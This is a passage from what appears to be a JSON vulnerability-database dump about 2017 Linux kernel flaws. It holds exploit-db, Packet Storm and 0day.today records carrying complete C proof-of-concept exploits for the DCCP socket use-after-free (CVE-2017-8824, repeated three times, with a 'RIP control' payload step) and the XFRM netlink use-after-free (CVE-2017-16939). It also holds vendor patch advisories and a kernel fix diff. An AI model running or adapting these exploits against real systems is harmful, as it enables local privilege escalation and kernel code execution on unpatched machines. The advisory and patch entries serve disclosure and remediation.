old and new sock objects can use\r\nthe same memory.\r\n\r\n\r\n\r\n####### LINKS ############\r\n\r\n\r\n\r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8824\r\n\r\nhttp://lists.openwall.net/netdev/2017/12/04/224\r\n\r\n\r\n\r\n####### CREDITS ############\r\n\r\n\r\n\r\nMohamed Ghannam\r\n*/\r\n\r\n/*This poc has been tested on my custom kernel reseach in ubuntu 4.10.5, the same thing applies to other versions\r\n * if you don't see RIP control, that means file_security_alloc is not called, so we should look for other similar object\r\n * */\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/syscall.h>\r\n#include <netinet/in.h>\r\n#include <unistd.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n\r\n\r\nint fd1,fd2;\r\nstruct sockaddr_in6 in1,in2;\r\n\r\nint do_uaf()\r\n{\r\n struct sockaddr_in6 cin1,cin2;\r\n\r\n fd1 = socket(0xa,6,0);\r\n\r\n memset(&in1,0,sizeof(in1));\r\n in1.sin6_family = AF_INET6;\r\n in1.sin6_addr = in6addr_loopback;\r\n in1.sin6_port = 0x214e;//htons(0x1000);\r\n bind(fd1,(struct sockaddr*)&in1,sizeof(in1));\r\n\r\n listen(fd1,0x1);\r\n\r\n fd2 = socket(0xa,6,0);\r\n\r\n memset(&cin1,0,sizeof(cin1));\r\n cin1.sin6_family = AF_INET6;\r\n cin1.sin6_addr = in6addr_loopback;\r\n cin1.sin6_port = 0x214e;//htons(0x1000);\r\n cin1.sin6_flowinfo = 0;\r\n connect(fd2,(struct sockaddr*)&cin1,sizeof(cin1));\r\n\r\n memset(&cin2,0,sizeof(cin2));\r\n connect(fd1,(struct sockaddr*)&cin2,sizeof(cin2));\r\n memset(&in2,0,sizeof(in2));\r\n\r\n in2.sin6_family = AF_INET6;\r\n in2.sin6_addr = in6addr_loopback;\r\n in2.sin6_port = htons(0x2000);\r\n in2.sin6_flowinfo = 0x2;\r\n in2.sin6_scope_id = 6;\r\n bind(fd2,(struct sockaddr*)&in2,sizeof(in2));\r\n\r\n struct sockaddr_in6 cin3;\r\n memset(&cin3,0,sizeof(cin3));\r\n connect(fd2,(struct sockaddr*)&cin3,sizeof(cin3));\r\n\r\n listen(fd2,0xb1);\r\n\r\n struct sockaddr_in6 cin4;\r\n memset(&cin4,0,sizeof(cin4));\r\n cin4.sin6_family = AF_INET6;\r\n cin4.sin6_port = htons(0x2000);//htons(0x3000);\r\n memset(&cin4.sin6_addr,0,sizeof(struct in6_addr));\r\n cin4.sin6_flowinfo = 1;\r\n cin4.sin6_scope_id = 0x32f1;\r\n connect(fd1,(struct sockaddr*)&cin4,sizeof(cin4));\r\n return fd2;\r\n}\r\n\r\nvoid * alloc_umem(void *addr,size_t size)\r\n{\r\n\r\n addr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0);\r\n if(addr == (char *)-1) {\r\n perror(\"mmap\");\r\n return NULL;\r\n }\r\n return addr;\r\n}\r\nint main(void)\r\n{\r\n char *addr;\r\n\r\n addr = (char *)alloc_umem((void*)0x100000000,4096);\r\n if(addr == NULL)\r\n exit(0);\r\n memset(addr,0xcc,4096);\r\n *(unsigned long *)(addr + 0x79) = 0xdeadbeef; /* RIP control */\r\n\r\n do_uaf();\r\n socket(AF_INET,SOCK_STREAM,0);\r\n close(fd2);\r\n return 0;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43234/"}, {"lastseen": "2018-02-15T18:54:47", "description": "Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation. CVE-2017-16939. Local exploit for Linux platform", "published": "2017-11-23T00:00:00", "type": "exploitdb", "title": "Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-16939"], "modified": "2017-11-23T00:00:00", "id": "EDB-ID:44049", "href": "https://www.exploit-db.com/exploits/44049/", "sourceData": "## Vulnerability Summary\r\nThe following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem \u2013 XFRM.\r\n\r\nNetlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules.\r\n\r\n## Credit\r\nAn independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\n## Vendor response\r\nThe vulnerability has been addressed as part of 1137b5e (\u201cipsec: Fix aborted xfrm policy dump crash\u201d) patch: CVE-2017-16939\r\n\r\n```\r\n @@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr\r\n\r\n static int xfrm_dump_policy_done(struct netlink_callback *cb)\r\n {\r\n- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];\r\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\r\n struct net *net = sock_net(cb->skb->sk);\r\n \r\n xfrm_policy_walk_done(walk, net);\r\n return 0;\r\n }\r\n \r\n+static int xfrm_dump_policy_start(struct netlink_callback *cb)\r\n+{\r\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\r\n+\r\n+ BUILD_BUG_ON(sizeof(*walk) > sizeof(cb->args));\r\n+\r\n+ xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);\r\n+ return 0;\r\n+}\r\n+\r\n static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb)\r\n {\r\n struct net *net = sock_net(skb->sk);\r\n- struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1];\r\n+ struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args;\r\n struct xfrm_dump_info info;\r\n \r\n- BUILD_BUG_ON(sizeof(struct xfrm_policy_walk) >\r\n- sizeof(cb->args) - sizeof(cb->args[0]));\r\n-\r\n info.in_skb = cb->skb;\r\n info.out_skb = skb;\r\n info.nlmsg_seq = cb->nlh->nlmsg_seq;\r\n info.nlmsg_flags = NLM_F_MULTI;\r\n \r\n- if (!cb->args[0]) {\r\n- cb->args[0] = 1;\r\n- xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY);\r\n- }\r\n-\r\n (void) xfrm_policy_walk(net, walk, dump_one_policy, &info);\r\n \r\n return skb->len;\r\n @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = {\r\n \r\n static const struct xfrm_link {\r\n int (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **);\r\n+ int (*start)(struct netlink_callback *);\r\n int (*dump)(struct sk_buff *, struct netlink_callback *);\r\n int (*done)(struct netlink_callback *);\r\n const struct nla_policy *nla_pol;\r\n @@ -2487,6 +2490,7 @@ static const struct xfrm_link {\r\n [XFRM_MSG_NEWPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_add_policy },\r\n [XFRM_MSG_DELPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy },\r\n [XFRM_MSG_GETPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy,\r\n+ .start = xfrm_dump_policy_start,\r\n .dump = xfrm_dump_policy,\r\n .done = xfrm_dump_policy_done },\r\n [XFRM_MSG_ALLOCSPI - XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi },\r\n @@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,\r\n \r\n {\r\n struct netlink_dump_control c = {\r\n+ .start = link->start,\r\n .dump = link->dump,\r\n .done = link->done,\r\n };\r\n```\r\n\r\n## Vulnerability details\r\nAn unprivileged user can change Netlink socket subsystem \u2013 XFRM value sk->sk_rcvbuf (sk == struct sock object).\r\n\r\nThe value can be changed into specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of a buffer receiving data via recvmsg/recv/read.\r\n\r\nThe sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects).\r\n\r\nskb->trusize is a variable which keep track of how many bytes of memory are consumed, in order to not wasting and manage memory, the kernel can handle the skb size at run time.\r\n\r\nFor example, if we allocate a large socket buffer (skb) and we only received 1-byte packet size, the kernel will adjust this by calling skb_set_owner_r.\r\n\r\nBy calling skb_set_owner_r the sk->sk_rmem_alloc (refers to an atomic variable sk->sk_backlog.rmem_alloc) is modified.\r\n\r\n\r\n\r\nWhen we create a XFRM netlink socket, xfrm_dump_policy is called, when we close the socket xfrm_dump_policy_done is called.\r\n\r\nxfrm_dump_policy_done is called whenever cb_running for netlink_sock object is true.\r\n\r\nThe xfrm_dump_policy_done tries to clean-up a xfrm walk entry which is managed by netlink_callback object.\r\n\r\n\r\n\r\nWhen netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates the sk_rmem_alloc.\r\n\r\nnetlink_dump():\r\n\r\n\r\nIn above snippet we can see that netlink_dump() check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (notice that we can control sk->sk_rcvbuf via stockpot).\r\n\r\nWhen this condition fails, it jumps to the end of a function and quit with failure and the value of cb_running doesn\u2019t changed to false.\r\n\r\nnlk->cb_running is true, thus xfrm_dump_policy_done() is being called.\r\n\r\n\r\n\r\nnlk->cb.done points to xfrm_dump_policy_done, it worth noting that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read/write what/where primitive.\r\n\r\n## Proof of Concept\r\n\r\nThe following proof of concept is for Ubuntu 17.04.\r\n\r\n```\r\n#define _GNU_SOURCE\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <asm/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <linux/netlink.h>\r\n#include <linux/xfrm.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n\r\n#define BUFSIZE 2048\r\n\r\n\r\nint fd;\r\nstruct sockaddr_nl addr;\r\n\r\nstruct msg_policy {\r\n struct nlmsghdr msg;\r\n char buf[BUFSIZE];\r\n};\r\n\r\nvoid create_nl_socket(void)\r\n{\r\n fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);\r\n memset(&addr,0,sizeof(struct sockaddr_nl));\r\n addr.nl_family = AF_NETLINK;\r\n addr.nl_pid = 0; /* packet goes into the kernel */\r\n addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */\r\n\r\n}\r\n\r\nvoid do_setsockopt(void)\r\n{\r\n int var =0x100;\r\n\r\n setsockopt(fd,1,SO_RCVBUF,&var,sizeof(int));\r\n}\r\n\r\nstruct msg_policy *init_policy_dump(int size)\r\n{\r\n struct msg_policy *r;\r\n\r\n r = malloc(sizeof(struct msg_policy));\r\n if(r == NULL) {\r\n perror(\"malloc\");\r\n exit(-1);\r\n }\r\n memset(r,0,sizeof(struct msg_policy));\r\n\r\n r->msg.nlmsg_len = 0x10;\r\n r->msg.nlmsg_type = XFRM_MSG_GETPOLICY;\r\n r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;\r\n r->msg.nlmsg_seq = 0x1;\r\n r->msg.nlmsg_pid = 2;\r\n return r;\r\n\r\n}\r\nint send_msg(int fd,struct nlmsghdr *msg)\r\n{\r\n int err;\r\n err = sendto(fd,(void *)msg,msg->nlmsg_len,0,(struct sockaddr*)&addr,sizeof(struct sockaddr_nl));\r\n if (err < 0) {\r\n perror(\"sendto\");\r\n return -1;\r\n }\r\n return 0;\r\n\r\n}\r\n\r\nvoid create_ns(void)\r\n{\r\n if(unshare(CLONE_NEWUSER) != 0) {\r\n perror(\"unshare(CLONE_NEWUSER)\");\r\n exit(1);\r\n }\r\n if(unshare(CLONE_NEWNET) != 0) {\r\n perror(\"unshared(CLONE_NEWUSER)\");\r\n exit(2);\r\n }\r\n}\r\nint main(int argc,char **argv)\r\n{\r\n struct msg_policy *p;\r\n create_ns();\r\n\r\n create_nl_socket();\r\n p = init_policy_dump(100);\r\n do_setsockopt();\r\n send_msg(fd,&p->msg);\r\n p = init_policy_dump(1000);\r\n send_msg(fd,&p->msg);\r\n return 0;\r\n}\r\n```", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44049/"}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405"], "description": "The kernel meta package ", "modified": "2017-12-04T19:05:31", "published": "2017-12-04T19:05:31", "id": "FEDORA:3CCDE601B23D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: kernel-4.13.16-302.fc27", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000405"], "description": "The kernel meta package ", "modified": "2017-12-04T20:15:47", "published": "2017-12-04T20:15:47", "id": "FEDORA:22E2B607603F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: kernel-4.13.16-202.fc26", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-12-07T22:31:31", "description": "", "published": "2017-12-07T00:00:00", "type": "packetstorm", "title": "Linux Kernel DCCP Socket Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8824"], "modified": "2017-12-07T00:00:00", "id": "PACKETSTORM:145235", "href": "https://packetstormsecurity.com/files/145235/Linux-Kernel-DCCP-Socket-Use-After-Free.html", "sourceData": "`/* \nThis is an announcement for CVE-2017-8824 which is a use-after-free \nvulnerability \n \nI found in Linux DCCP socket. It can be used to gain kernel code execution \nfrom unprivileged processes. \n \n \n \nYouall find in attachment the proof of concept code and the kernel panic \nlog. \n \n \n \n####### BUG DETAILS ############ \n \n \n \nWhen a socket sock object is in DCCP_LISTEN state and connect() system \ncall is being called with AF_UNSPEC, \n \nthe dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free \ndccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them, \n \nthen when we call connect() again with AF_INET6 sockaddr family, the sock \nobject gets cloned via dccp_create_openreq_child() and returns a new sock \nobject, \n \nwhich holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old \nsock object, and this leads to both the old and new sock objects can use \nthe same memory. \n \n \n \n####### LINKS ############ \n \n \n \nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8824 \n \nhttp://lists.openwall.net/netdev/2017/12/04/224 \n \n \n \n####### CREDITS ############ \n \n \n \nMohamed Ghannam \n*/ \n \n/*This poc has been tested on my custom kernel reseach in ubuntu 4.10.5, the same thing applies to other versions \n* if you don't see RIP control, that means file_security_alloc is not called, so we should look for other similar object \n* */ \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <string.h> \n#include <stdlib.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <sys/syscall.h> \n#include <netinet/in.h> \n#include <unistd.h> \n#include <pthread.h> \n#include <sys/mman.h> \n \n \nint fd1,fd2; \nstruct sockaddr_in6 in1,in2; \n \nint do_uaf() \n{ \nstruct sockaddr_in6 cin1,cin2; \n \nfd1 = socket(0xa,6,0); \n \nmemset(&in1,0,sizeof(in1)); \nin1.sin6_family = AF_INET6; \nin1.sin6_addr = in6addr_loopback; \nin1.sin6_port = 0x214e;//htons(0x1000); \nbind(fd1,(struct sockaddr*)&in1,sizeof(in1)); \n \nlisten(fd1,0x1); \n \nfd2 = socket(0xa,6,0); \n \nmemset(&cin1,0,sizeof(cin1)); \ncin1.sin6_family = AF_INET6; \ncin1.sin6_addr = in6addr_loopback; \ncin1.sin6_port = 0x214e;//htons(0x1000); \ncin1.sin6_flowinfo = 0; \nconnect(fd2,(struct sockaddr*)&cin1,sizeof(cin1)); \n \nmemset(&cin2,0,sizeof(cin2)); \nconnect(fd1,(struct sockaddr*)&cin2,sizeof(cin2)); \nmemset(&in2,0,sizeof(in2)); \n \nin2.sin6_family = AF_INET6; \nin2.sin6_addr = in6addr_loopback; \nin2.sin6_port = htons(0x2000); \nin2.sin6_flowinfo = 0x2; \nin2.sin6_scope_id = 6; \nbind(fd2,(struct sockaddr*)&in2,sizeof(in2)); \n \nstruct sockaddr_in6 cin3; \nmemset(&cin3,0,sizeof(cin3)); \nconnect(fd2,(struct sockaddr*)&cin3,sizeof(cin3)); \n \nlisten(fd2,0xb1); \n \nstruct sockaddr_in6 cin4; \nmemset(&cin4,0,sizeof(cin4)); \ncin4.sin6_family = AF_INET6; \ncin4.sin6_port = htons(0x2000);//htons(0x3000); \nmemset(&cin4.sin6_addr,0,sizeof(struct in6_addr)); \ncin4.sin6_flowinfo = 1; \ncin4.sin6_scope_id = 0x32f1; \nconnect(fd1,(struct sockaddr*)&cin4,sizeof(cin4)); \nreturn fd2; \n} \n \nvoid * alloc_umem(void *addr,size_t size) \n{ \n \naddr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0); \nif(addr == (char *)-1) { \nperror(\"mmap\"); \nreturn NULL; \n} \nreturn addr; \n} \nint main(void) \n{ \nchar *addr; \n \naddr = (char *)alloc_umem((void*)0x100000000,4096); \nif(addr == NULL) \nexit(0); \nmemset(addr,0xcc,4096); \n*(unsigned long *)(addr + 0x79) = 0xdeadbeef; /* RIP control */ \n \ndo_uaf(); \nsocket(AF_INET,SOCK_STREAM,0); \nclose(fd2); \nreturn 0; \n} \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/145235/lkdccpsocket-uaf.txt"}], "zdt": [{"lastseen": "2018-02-06T01:07:57", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2017-12-07T00:00:00", "type": "zdt", "title": "Linux Kernel - DCCP Socket Use-After-Free Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8824"], "modified": "2017-12-07T00:00:00", "href": "https://0day.today/exploit/description/29141", "id": "1337DAY-ID-29141", "sourceData": "/*\r\nThis is an announcement for CVE-2017-8824 which is a use-after-free\r\nvulnerability\r\n \r\nI found in Linux DCCP socket. It can be used to gain kernel code execution\r\nfrom unprivileged processes.\r\n \r\n \r\n \r\nYou\u2019ll find in attachment the proof of concept code and the kernel panic\r\nlog.\r\n \r\n \r\n \r\n####### BUG DETAILS ############\r\n \r\n \r\n \r\nWhen a socket sock object is in DCCP_LISTEN state and connect() system\r\ncall is being called with AF_UNSPEC,\r\n \r\nthe dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free\r\ndccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them,\r\n \r\nthen when we call connect() again with AF_INET6 sockaddr family, the sock\r\nobject gets cloned via dccp_create_openreq_child() and returns a new sock\r\nobject,\r\n \r\nwhich holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old\r\nsock object, and this leads to both the old and new sock objects can use\r\nthe same memory.\r\n \r\n \r\n \r\n####### LINKS ############\r\n \r\n \r\n \r\nhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8824\r\n \r\nhttp://lists.openwall.net/netdev/2017/12/04/224\r\n \r\n \r\n \r\n####### CREDITS ############\r\n \r\n \r\n \r\nMohamed Ghannam\r\n*/\r\n \r\n/*This poc has been tested on my custom kernel reseach in ubuntu 4.10.5, the same thing applies to other versions\r\n * if you don't see RIP control, that means file_security_alloc is not called, so we should look for other similar object\r\n * */\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/syscall.h>\r\n#include <netinet/in.h>\r\n#include <unistd.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n \r\n \r\nint fd1,fd2;\r\nstruct sockaddr_in6 in1,in2;\r\n \r\nint do_uaf()\r\n{\r\n struct sockaddr_in6 cin1,cin2;\r\n \r\n fd1 = socket(0xa,6,0);\r\n \r\n memset(&in1,0,sizeof(in1));\r\n in1.sin6_family = AF_INET6;\r\n in1.sin6_addr = in6addr_loopback;\r\n in1.sin6_port = 0x214e;//htons(0x1000);\r\n bind(fd1,(struct sockaddr*)&in1,sizeof(in1));\r\n \r\n listen(fd1,0x1);\r\n \r\n fd2 = socket(0xa,6,0);\r\n \r\n memset(&cin1,0,sizeof(cin1));\r\n cin1.sin6_family = AF_INET6;\r\n cin1.sin6_addr = in6addr_loopback;\r\n cin1.sin6_port = 0x214e;//htons(0x1000);\r\n cin1.sin6_flowinfo = 0;\r\n connect(fd2,(struct sockaddr*)&cin1,sizeof(cin1));\r\n \r\n memset(&cin2,0,sizeof(cin2));\r\n connect(fd1,(struct sockaddr*)&cin2,sizeof(cin2));\r\n memset(&in2,0,sizeof(in2));\r\n \r\n in2.sin6_family = AF_INET6;\r\n in2.sin6_addr = in6addr_loopback;\r\n in2.sin6_port = htons(0x2000);\r\n in2.sin6_flowinfo = 0x2;\r\n in2.sin6_scope_id = 6;\r\n bind(fd2,(struct sockaddr*)&in2,sizeof(in2));\r\n \r\n struct sockaddr_in6 cin3;\r\n memset(&cin3,0,sizeof(cin3));\r\n connect(fd2,(struct sockaddr*)&cin3,sizeof(cin3));\r\n \r\n listen(fd2,0xb1);\r\n \r\n struct sockaddr_in6 cin4;\r\n memset(&cin4,0,sizeof(cin4));\r\n cin4.sin6_family = AF_INET6;\r\n cin4.sin6_port = htons(0x2000);//htons(0x3000);\r\n memset(&cin4.sin6_addr,0,sizeof(struct in6_addr));\r\n cin4.sin6_flowinfo = 1;\r\n cin4.sin6_scope_id = 0x32f1;\r\n connect(fd1,(struct sockaddr*)&cin4,sizeof(cin4));\r\n return fd2;\r\n}\r\n \r\nvoid * alloc_umem(void *addr,size_t size)\r\n{\r\n \r\n addr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0);\r\n if(addr == (char *)-1) {\r\n perror(\"mmap\");\r\n return NULL;\r\n }\r\n return addr;\r\n}\r\nint main(void)\r\n{\r\n char *addr;\r\n \r\n addr = (char *)alloc_umem((void*)0x100000000,4096);\r\n if(addr == NULL)\r\n exit(0);\r\n memset(addr,0xcc,4096);\r\n *(unsigned long *)(addr + 0x79) = 0xdeadbeef; /* RIP control */\r\n \r\n do_uaf();\r\n socket(AF_INET,SOCK_STREAM,0);\r\n close(fd2);\r\n return 0;\r\n}\n\n# 0day.today [2018-02-05] #", "sourceHref": "https://0day.today/exploit/29141", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2020-11-10T12:36:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-15115", "CVE-2017-16994", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2016-5195", "CVE-2017-1000405", "CVE-2017-16645"], "description": "**Issue Overview:**\n\nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. ([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It could occur if a guest was to flood the I/O port 0x80 with write requests. A guest user could use this flaw to crash the host kernel resulting in DoS. ([CVE-2017-1000407 __](<https://access.redhat.com/security/cve/CVE-2017-1000407>))\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16647 __](<https://access.redhat.com/security/cve/CVE-2017-16647>))\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (BUG and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16646 __](<https://access.redhat.com/security/cve/CVE-2017-16646>))\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16645 __](<https://access.redhat.com/security/cve/CVE-2017-16645>))\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16643 __](<https://access.redhat.com/security/cve/CVE-2017-16643>))\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call. ([CVE-2017-16994 __](<https://access.redhat.com/security/cve/CVE-2017-16994>))\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16650 __](<https://access.redhat.com/security/cve/CVE-2017-16650>))\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16649 __](<https://access.redhat.com/security/cve/CVE-2017-16649>))\n\nA vulnerability was found in the Linux kernel when peeling off an association to the socket in another network namespace. All transports in this association are not to be rehashed and keep using the old key in hashtable, thus removing transports from hashtable when closing the socket, all transports are being freed. Later on a use-after-free issue could be caused when looking up an association and dereferencing the transports. ([CVE-2017-15115 __](<https://access.redhat.com/security/cve/CVE-2017-15115>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.9.70-22.55.amzn1.i686 \n kernel-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-4.9.70-22.55.amzn1.i686 \n perf-debuginfo-4.9.70-22.55.amzn1.i686 \n kernel-tools-devel-4.9.70-22.55.amzn1.i686 \n kernel-headers-4.9.70-22.55.amzn1.i686 \n kernel-tools-4.9.70-22.55.amzn1.i686 \n kernel-devel-4.9.70-22.55.amzn1.i686 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.70-22.55.amzn1.noarch \n \n src: \n kernel-4.9.70-22.55.amzn1.src \n \n x86_64: \n kernel-tools-4.9.70-22.55.amzn1.x86_64 \n kernel-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-headers-4.9.70-22.55.amzn1.x86_64 \n kernel-4.9.70-22.55.amzn1.x86_64 \n perf-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1.x86_64 \n perf-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-4.9.70-22.55.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2017-12-21T00:02:00", "published": "2017-12-21T00:02:00", "id": "ALAS-2017-937", "href": "https://alas.aws.amazon.com/ALAS-2017-937.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939"], "description": "[4.1.12-124.16.2]\n- netlink: add a start callback for starting a netlink dump (Tom Herbert) [Orabug: 27169581] {CVE-2017-16939}\n- ipsec: Fix aborted xfrm policy dump crash (Herbert Xu) [Orabug: 27169581] {CVE-2017-16939}", "edition": 4, "modified": "2018-06-13T00:00:00", "published": "2018-06-13T00:00:00", "id": "ELSA-2018-4131", "href": "http://linux.oracle.com/errata/ELSA-2018-4131.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}